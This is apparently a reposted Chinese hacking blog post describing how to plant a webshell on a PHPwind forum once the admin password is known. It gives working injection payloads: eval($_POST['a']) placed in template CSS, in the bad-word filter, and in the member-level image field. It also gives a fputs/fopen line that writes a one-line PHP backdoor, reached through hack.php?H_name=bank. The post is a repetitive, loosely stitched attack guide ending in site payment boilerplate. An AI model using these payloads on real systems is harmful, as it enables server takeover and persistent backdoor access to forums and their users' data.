PHPwind后台获取Webshell

发现的一个phpwind漏洞搞的热闹非凡,该漏洞是因为message.php 文件的几个变量未进行过滤造成的。官方已发布补丁,所以我在这里摘一点关于取得管理密码后怎么拿webshell的方法:
方式1 模板法 
进入后台, 风格模版设置 ,在随便一行写代码
记住,这代码必须顶着左边行写,代码前面不可以有任何字符。
EOT;
eval($a);
print <<<EOT
例如,我写完某一行为。
.headurl { color:#ffffff;}
EOT;
eval($_POST['a']);
print <<<EOT
.index_font{color: #3A4F6C;background-color:#EBEBEB; font-weight:bold;padding: 5px;}

而后得到一个shell
http://localhost/bbs/index.php
(由于写到css里,也许有的操作无法返回,但是只要没有什么问题,一般操作都是可以接受的)
密码是a lanker的一句话后门。

方始2 脏话过滤法

进入 安全管理 ◇ 不良词语过滤

新增 
不良词语写 a']='aa';eval($_POST['a']);//
替换为那里可以随意

而后得到一个shell地址为 
http://localhost/bbs/data/bbscache/wordsfb.php

密码是a lanker的一句话后门。
方式3 用户等级管理
然后新建立会员组
头衔你可以随便写,但是千万不要写单双引号特殊符号,升级图片号写a';eval($_POST['a']);//
升级点数依然可以随意写。
而后得到一个shell地址为 
http://localhost/bbs/data/bbscache/level.php
密码是a lanker的一句话后门。
这里提供的方式随便你选一种都可以得到shell。。。
方式三请按说明仔细操作,否则会导致论坛无法正常运行,后果,自负。
可我一一试过,没能拿到SHELL.

三种方法

1:后台添加个 asa 上传
2:<?fputs(fopen("./a.php","w"),"<?eval(/$_POST[a]);?>")?>然后看图修改包含银行查件文件名
bank.php为上传的phpshell的相对路径,访问url://hack.php?H_name=bank,就会在论坛根目录生成一
个a.php的最小马。

3:不用上传就是在词语替换那<?fputs(fopen("./a.php","w"),"<?eval(/$_POST[a]);?>")?>插入,然后
备份wordsfb字段记下相对路径。
-----------------------------------------------------------------
phpwind后台获得shell(貌似很管用)
如果是winnt系统直接添加一个.asa后缀的文件,(dz可以直接传asa)在后台找到文件上传的后的文件名,
论坛发个phpshell,<?fputs(fopen("./a.php","w"),"<?eval(/$_POST[a]);?>")?>
然后看图修改包含银行查件文件名bank.php为上传的phpshell的相对路径,
访问url://hack.php?H_name=bank,就
会在论坛根目录生成一个a.php的最小马。
还有不用上传就是在词语替换那<?fputs(fopen("./a.php","w"),"<?eval(/$_POST[a]);?>")?>插入,
然后备份wordsfb字段记下相对路径 http://www.98exe.cn南域安全网 windows最新漏洞,网络技术!·#¥%%……  
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值